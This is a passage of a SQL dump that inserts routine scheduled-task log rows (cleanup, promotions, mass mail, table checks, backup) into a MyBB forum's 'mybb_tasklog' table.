`tid`, `dateline`, `data`) VALUES ('12739', '3', '1351182473', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12740', '1', '1351183259', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12741', '7', '1351183273', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12742', '3', '1351183290', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12743', '9', '1351183300', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12744', '5', '1351184034', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12745', '9', '1351184101', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12746', '3', '1351185268', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12747', '1', '1351185278', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12748', '7', '1351186582', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12749', '5', '1351186591', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12750', '9', '1351186605', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12751', '3', '1351186681', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12752', '9', '1351186903', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12753', '5', '1351188608', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12754', '9', '1351188674', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12755', '3', '1351188690', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12756', '1', '1351189403', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12757', '7', '1351189925', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12758', '5', '1351189935', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12759', '9', '1351189990', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12760', '3', '1351189993', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12761', '9', '1351191161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12762', '5', '1351191171', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12763', '9', '1351192054', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12764', '3', '1351192058', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12765', '1', '1351192064', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12766', '7', '1351192072', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12767', '5', '1351192081', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12768', '9', '1351192749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12769', '5', '1351193126', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12770', '9', '1351193134', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12771', '3', '1351193435', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12772', '9', '1351194196', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12773', '5', '1351194533', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12774', '9', '1351195151', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12775', '3', '1351195185', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12776', '1', '1351196199', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12777', '7', '1351196204', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12778', '5', '1351196216', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12779', '9', '1351196232', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12780', '5', '1351196716', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12781', '9', '1351196875', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12782', '3', '1351197146', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12783', '9', '1351197711', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12784', '5', '1351198037', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12785', '9', '1351198903', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12786', '3', '1351198942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12787', '1', '1351198944', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12788', '7', '1351198951', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12789', '5', '1351199504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12790', '9', '1351199993', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12791', '5', '1351201273', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12792', '9', '1351201311', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12793', '3', '1351201317', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12794', '5', '1351201527', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12795', '9', '1351202115', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12796', '3', '1351202355', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12797', '1', '1351202425', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12798', '7', '1351202451', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12799', '5', '1351203070', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12800', '9', '1351203382', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12801', '5', '1351204109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12802', '9', '1351204973', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12803', '3', '1351205018', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12804', '5', '1351205710', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12805', '9', '1351205717', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12806', '3', '1351206638', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12807', '1', '1351206656', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12808', '7', '1351206674', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12809', '5', '1351206692', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12810', '9', '1351206724', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12811', '5', '1351207501', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12812', '9', '1351207621', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12813', '3', '1351208596', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12814', '9', '1351208645', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12815', '5', '1351209015', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12816', '9', '1351210024', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12817', '3', '1351210041', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12818', '1', '1351210430', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12819', '2', '1351210582', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12820', '7', '1351210795', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12821', '11', '1351210818', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12822', '5', '1351211360', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12823', '9', '1351211643', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12824', '3', '1351211646', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12825', '9', '1351212298', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12826', '5', '1351212302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12827', '9', '1351212929', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12828', '3', '1351213219', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12829', '1', '1351213221', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12830', '7', '1351213223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12831', '5', '1351213662', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12832', '9', '1351213833', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12833', '5', '1351214848', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12834', '9', '1351214863', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12835', '3', '1351215003', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12836', '9', '1351215604', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12837', '5', '1351215931', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12838', '9', '1351216547', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12839', '3', '1351216753', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12840', '1', '1351216911', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12841', '7', '1351216922', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12842', '5', '1351217107', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12843', '9', '1351217436', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12844', '5', '1351218310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12845', '9', '1351218336', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12846', '3', '1351218618', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12847', '9', '1351220336', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12848', '5', '1351221304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12849', '3', '1351223669', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12850', '1', '1351224091', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12851', '7', '1351224098', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12852', '9', '1351224978', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12853', '5', '1351225014', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12854', '3', '1351225038', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12855', '5', '1351225588', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12856', '9', '1351228456', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12857', '3', '1351228613', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12858', '5', '1351228631', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12859', '1', '1351228647', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12860', '7', '1351228674', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12861', '5', '1351229393', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12862', '9', '1351229432', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12863', '3', '1351230688', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12864', '9', '1351233733', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12865', '5', '1351233742', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12866', '3', '1351233811', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12867', '1', '1351235245', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12868', '7', '1351235266', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12869', '5', '1351235846', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12870', '9', '1351235912', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12871', '3', '1351235928', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12872', '5', '1351236341', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12873', '9', '1351236420', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12874', '3', '1351236729', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12875', '9', '1351237463', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12876', '5', '1351237559', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12877', '9', '1351238216', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12878', '3', '1351238360', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12879', '1', '1351238426', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12880', '7', '1351238468', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12881', '5', '1351238754', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12882', '9', '1351239170', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12883', '5', '1351239980', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12884', '9', '1351240679', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12885', '3', '1351241053', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12886', '9', '1351241188', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12887', '5', '1351241212', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12888', '9', '1351241756', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12889', '3', '1351242804', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12890', '1', '1351243804', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12891', '7', '1351243820', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12892', '5', '1351244088', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12893', '9', '1351246471', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12894', '3', '1351246806', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12895', '5', '1351246837', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12896', '1', '1351246864', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12897', '7', '1351247168', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12898', '5', '1351247568', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12899', '9', '1351247580', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12900', '3', '1351247775', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12901', '9', '1351248207', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12902', '5', '1351248386', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12903', '9', '1351249162', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12904', '3', '1351249201', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12905', '1', '1351249387', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12906', '7', '1351249418', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12907', '5', '1351249796', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12908', '9', '1351250471', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12909', '5', '1351250719', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12910', '9', '1351250769', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12911', '3', '1351251179', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12912', '9', '1351252407', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12913', '5', '1351252413', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12914', '9', '1351252548', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12915', '3', '1351252810', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12916', '1', '1351252989', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12917', '4', '1351252999', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12918', '7', '1351253113', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12919', '5', '1351253124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12920', '9', '1351253488', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12921', '5', '1351254302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12922', '9', '1351254352', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12923', '3', '1351254726', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12924', '9', '1351255369', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12925', '5', '1351255520', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12926', '9', '1351256385', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12927', '3', '1351256386', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12928', '1', '1351256408', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12929', '7', '1351256408', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12930', '5', '1351256713', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12931', '9', '1351260415', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12932', '5', '1351260435', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12933', '3', '1351260457', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12934', '1', '1351260461', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12935', '7', '1351260495', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12936', '9', '1351260603', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12937', '5', '1351261999', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12938', '9', '1351262400', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12939', '3', '1351262665', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12940', '5', '1351264152', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12941', '9', '1351264159', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12942', '3', '1351264162', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12943', '1', '1351264168', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, 